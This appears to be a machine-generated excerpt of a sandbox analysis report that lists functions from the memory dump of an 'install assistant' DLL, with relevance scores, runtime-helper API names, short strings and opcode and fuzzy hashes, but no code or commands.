                              • Instruction ID: 3c58206ddd5bf7a1833c981ac3b62bd07d31fb98dcde9dd7931c6b17a624ab40
                              • Opcode Fuzzy Hash: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                              • Instruction Fuzzy Hash: 2B127971900209EFEF10CFA6C880AEDBBB9FF58318F208169E915ABA90C735D944CF50
                              Function 6C954FA6 Relevance: 9.1, APIs: 6, Instructions: 95COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: __aulldiv$__aullrem
                              • String ID:
                              • API String ID: 2022606265-0
                              • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                              • Instruction ID: eceecbd332e9c87f5503a4b84a6e1b93cc30ee2ac8cb1161da3aceebaa3d3d3c
                              • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                              • Instruction Fuzzy Hash: 2421CE30901219FBDF21CEA49C40DEF7A6DEF657A8F608226F52961691D271CE60C7A2
                              Function 6C95A6EC Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 183COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C95A6F1
                                • Part of subcall function 6C969173: __EH_prolog.LIBCMT ref: 6C969178
                              • __EH_prolog.LIBCMT ref: 6C95A8F9
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: IJ$WIJ$J
                              • API String ID: 3519838083-740443243
                              • Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                              • Instruction ID: b0a6deb58297766dad123fc121b5588c724d23d966307b0d2138970e3ce252f6
                              • Opcode Fuzzy Hash: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                              • Instruction Fuzzy Hash: 7E71BD30904259DFDB14CFA4C480BEDB7B4BF24308F5084A9D955ABB92CF74EA19CBA4
                              Function 6C96E418 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C96E41D
                                • Part of subcall function 6C96EE40: __EH_prolog.LIBCMT ref: 6C96EE45
                                • Part of subcall function 6C96E8EB: __EH_prolog.LIBCMT ref: 6C96E8F0
                                • Part of subcall function 6C96E593: __EH_prolog.LIBCMT ref: 6C96E598
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: &qB$0aJ$A0$XqB
                              • API String ID: 3519838083-1326096578
                              • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                              • Instruction ID: 2f7c2ec338aeb35f1f4739777544ee50b098027935cad411e5086ec3e209693c
                              • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                              • Instruction Fuzzy Hash: 6E218B71D01288EADB05DBE5D9849EDBBB4AF35318F60406DE41667781DF788E0CCB51
                              Function 6C96E234 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 43COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: J$0J$DJ$`J
                              • API String ID: 3519838083-2453737217
                              • Opcode ID: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                              • Instruction ID: 82af56520403e9382f305bb7b1f5d1841212c986ad34cc96c3de298c975bbd0c
                              • Opcode Fuzzy Hash: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                              • Instruction Fuzzy Hash: 6A11C2B0904B64CEC720DF5AC55419AFBE4BFB5708B10CA1FC4A687B50C7F8A508CB99
                              Function 6C996E3F Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 452COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: $!$@
                              • API String ID: 3519838083-2517134481
                              • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                              • Instruction ID: 64fe0f4929e6bfa6a43a6e99336d8c096e5fb0fe98a10ddf03f2f79ae18a5efe
                              • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                              • Instruction Fuzzy Hash: 0A127F70E05249DFCF04CFA4C490AEDBBB5BF29308F188469E845ABB51DB31E955CBA1
                              Function 6C962B91 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 284COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog__aulldiv
                              • String ID: $SJ
                              • API String ID: 4125985754-3948962906
                              • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                              • Instruction ID: 69d3c50e0a1260521e5b6550805c53723cf3cf40ed2f4b13d03f4da43bc77ee2
                              • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                              • Instruction Fuzzy Hash: 28B17DB1D0060ADFDB14CFA6C9949AEBBB5FF58318F20852ED415A7B90C734EA45CB50
                              Function 6C9661D6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: $CK$CK
                              • API String ID: 3519838083-2957773085
                              • Opcode ID: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                              • Instruction ID: 06c552940979f2b5e7ee87b8f070a86a5ee212082757d9b19c442036e2516fa6
                              • Opcode Fuzzy Hash: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                              • Instruction Fuzzy Hash: E9218E70E012458BEB04DFAAC4805EEB7B6BFA4304F54462AC512E3ED1CB748A06CAA0
                              Function 6C974EC7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 54COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C974ECC
                                • Part of subcall function 6C95F58A: __EH_prolog.LIBCMT ref: 6C95F58F
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: :hJ$dJ$xJ
                              • API String ID: 3519838083-2437443688
                              • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                              • Instruction ID: 1e06b57a6cec8db350fc8bd76b9fc0d8c5ec39d8de50b3152f19b4dde0e6bade
                              • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                              • Instruction Fuzzy Hash: 7A21ECB1805B40CFC760CF6AC14429ABBF4FF29718B50C96EC1AA97B11D7B8A508CF59
                              Function 6C96BD0E Relevance: 6.4, Strings: 5, Instructions: 105COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: <J$DJ$HJ$TJ$]
                              • API String ID: 0-686860805
                              • Opcode ID: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                              • Instruction ID: a74df26bc90d298ebe10d7ab32255c1351e40a7331b4b06e38e4b40da4644b10
                              • Opcode Fuzzy Hash: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                              • Instruction Fuzzy Hash: F441C471C05289AFEF15DBA2D5A08EEB774AF3020CB60C069E12127E91FB31E649DB41
                              Function 6C966331 Relevance: 6.1, APIs: 4, Instructions: 76COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: __aulldiv
                              • String ID:
                              • API String ID: 3732870572-0
                              • Opcode ID: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                              • Instruction ID: b4b8f3c96ec9dfa4737686e431f508b7714bc01dded89640ad6d09ec826cd82c
                              • Opcode Fuzzy Hash: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                              • Instruction Fuzzy Hash: 1B118E76600204BEEB214AA5DC44EAB7BBDEFA9744F10842DF24156E90D671EC04D720
                              Function 6C94E072 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 398COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C94E077
                                • Part of subcall function 6C94DFF5: __EH_prolog.LIBCMT ref: 6C94DFFA
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: :$\
                              • API String ID: 3519838083-1166558509
                              • Opcode ID: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                              • Instruction ID: bcd54da7e21c29a6ff07fedf963da9f967055f04892e729d110cd3a20bc4281d
                              • Opcode Fuzzy Hash: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                              • Instruction Fuzzy Hash: 73E1CE31900209DACF25DFA8C890BEDF7B9AF2531CF10C219D85567B90EB75EA49CB91
                              Function 6C973C20 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 224COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: @$hfJ
                              • API String ID: 3519838083-1391159562
                              • Opcode ID: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                              • Instruction ID: d23f8ec7981cc638b236702e11c0bc7d6272688382cb26db94b88830f2782f33
                              • Opcode Fuzzy Hash: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                              • Instruction Fuzzy Hash: 43914C70911648DFCB20DFA9C9849DEFBF4BF28308F54452EE556A7A50E770E948CB21
                              Function 6C968C58 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 213COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C968C5D
                                • Part of subcall function 6C96761A: __EH_prolog.LIBCMT ref: 6C96761F
                                • Part of subcall function 6C967A2E: __EH_prolog.LIBCMT ref: 6C967A33
                                • Part of subcall function 6C968EA5: __EH_prolog.LIBCMT ref: 6C968EAA
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: WZJ
                              • API String ID: 3519838083-1089469559
                              • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                              • Instruction ID: 6d0dbe5c4d58ceb32707f3b9b3ad70ccfcb01b852e2712d1b2e6f5a94ce25efa
                              • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                              • Instruction Fuzzy Hash: 20817A31D01149DFDB19DFA5D990ADDB7B4AF39318F10809AE402A7B90DB30EA09CB65
                              Function 6C99A3DF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog__aullrem
                              • String ID: d%K
                              • API String ID: 3415659256-3110269457
                              • Opcode ID: ac62a312e9615e63fe83044f2985e6da76b9d9f2e0a1fb3315288c38c591097e
                              • Instruction ID: a41a9ed4294be7f8317b3445dde4bdcc8ce2588c8b9dc14ae05614bd5e714359
                              • Opcode Fuzzy Hash: ac62a312e9615e63fe83044f2985e6da76b9d9f2e0a1fb3315288c38c591097e
                              • Instruction Fuzzy Hash: 7661AB31E012098BDF01CF54C544BEEB7F9EF59309F288058D858ABA91DB75DE05CBA1
                              Function 6C9965B2 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: CK$CK
                              • API String ID: 3519838083-2096518401
                              • Opcode ID: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                              • Instruction ID: 5e6d3a629219eff6ef0c448627e4f4fc19d05d4c902802f700fea97d1abbec59
                              • Opcode Fuzzy Hash: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                              • Instruction Fuzzy Hash: 69519D75A00306DFDB40CFA4C880AEEB3B9FF98758F198529D901EB641DB74E905CBA0
                              Function 6C96FF9C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: <dJ$Q
                              • API String ID: 3519838083-2252229148
                              • Opcode ID: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                              • Instruction ID: 6fa32b107e88cb145106c04adf2cc47fcabaeac387bc773f7bcf3d927d4f69ce
                              • Opcode Fuzzy Hash: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                              • Instruction Fuzzy Hash: 52519E70905289EFCF20DFA4C8849EDB7B5BF59318F10852EE515ABA50D732DA49CB20
                              Function 6C97014A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: PdJ$Q
                              • API String ID: 3519838083-3674001488
                              • Opcode ID: 87eb3cb62c03194caae5458ff4b741e3c8b0552ef8959399e26f931c5ab5bbcd
                              • Instruction ID: 7f858b2d6311d06aed652ed8a467f30e8d17c9f9eb7136cd3de3923cb03c2177
                              • Opcode Fuzzy Hash: 87eb3cb62c03194caae5458ff4b741e3c8b0552ef8959399e26f931c5ab5bbcd
                              • Instruction Fuzzy Hash: E841E272D02285DBCF21DFA8C4909DDB7B8FF49318F10D16AE925A7A50C332DA45CBA0
                              Function 6C984C24 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 100COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: 0|J$`)L
                              • API String ID: 3519838083-117937767
                              • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                              • Instruction ID: 1c53f6e0baa837599f33cae7493caaa1e6d9c14841bdff40df136558a267b6e2
                              • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                              • Instruction Fuzzy Hash: 3E418231606745EFCB118F64C5A07EABBEAFF65208F01882EE05A97B50DB31E905CB91
                              Function 6C987CB6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: __aulldiv
                              • String ID: 3333
                              • API String ID: 3732870572-2924271548
                              • Opcode ID: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                              • Instruction ID: 0bc0cead68bb89205625d38dade3a4c886c9f99525a95d5875e6026078b24155
                              • Opcode Fuzzy Hash: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                              • Instruction Fuzzy Hash: 642162B0A01744AED7208FA98880A6BBAFDEB69754F108D1EF146D7B41D670E9048B65
                              Function 6C980906 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: @$LuJ
                              • API String ID: 3519838083-205571748
                              • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                              • Instruction ID: f4c74c788337538c01c02b15f177e15518d4eb6cd1b8f2c130b45bb9ae92df14
                              • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                              • Instruction Fuzzy Hash: 3A0184B1E02349DADB10DF9988805AEF7B4FF69744F40982EE569E3A41C3749904CB55
                              Function 6C95C0AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: @$xMJ
                              • API String ID: 3519838083-951924499
                              • Opcode ID: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                              • Instruction ID: 16ec661ef5a29722fe15970be3fbb12bdfa1381e324fba3ffcd28328600b1fb1
                              • Opcode Fuzzy Hash: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                              • Instruction Fuzzy Hash: 74112A71A01249DBCB00DF99C4905AEB7B4FF6C348F90C86ED46AE7640D338DA15CB95
                              Function 6C9AC5D5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: p/K$J
                              • API String ID: 3519838083-2069324279
                              • Opcode ID: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                              • Instruction ID: ac0fd02d0585499d5ae279ab134455466db5ef40c565bd0b7da206436e41bfd6
                              • Opcode Fuzzy Hash: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                              • Instruction Fuzzy Hash: 6801BCB1A117159FD724CF98C5043AAB7F8EF64729F10C81E9052A3B40C7F8E5088BA5
                              Function 6C98AFC7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C98AFCC
                                • Part of subcall function 6C98A4D1: __EH_prolog.LIBCMT ref: 6C98A4D6
                                • Part of subcall function 6C98914B: __EH_prolog.LIBCMT ref: 6C989150
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: J$0J
                              • API String ID: 3519838083-2882003284
                              • Opcode ID: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                              • Instruction ID: 5714eb5d8f0cbcc2ec6c5a1c0b4ce526bf7633877aefda9018c8ea8679f01615
                              • Opcode Fuzzy Hash: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                              • Instruction Fuzzy Hash: 4F0105B1805B50CFC325CF65C4A428AFBE0BB25304F90CD5EC0A657B50D7B8A508CB68
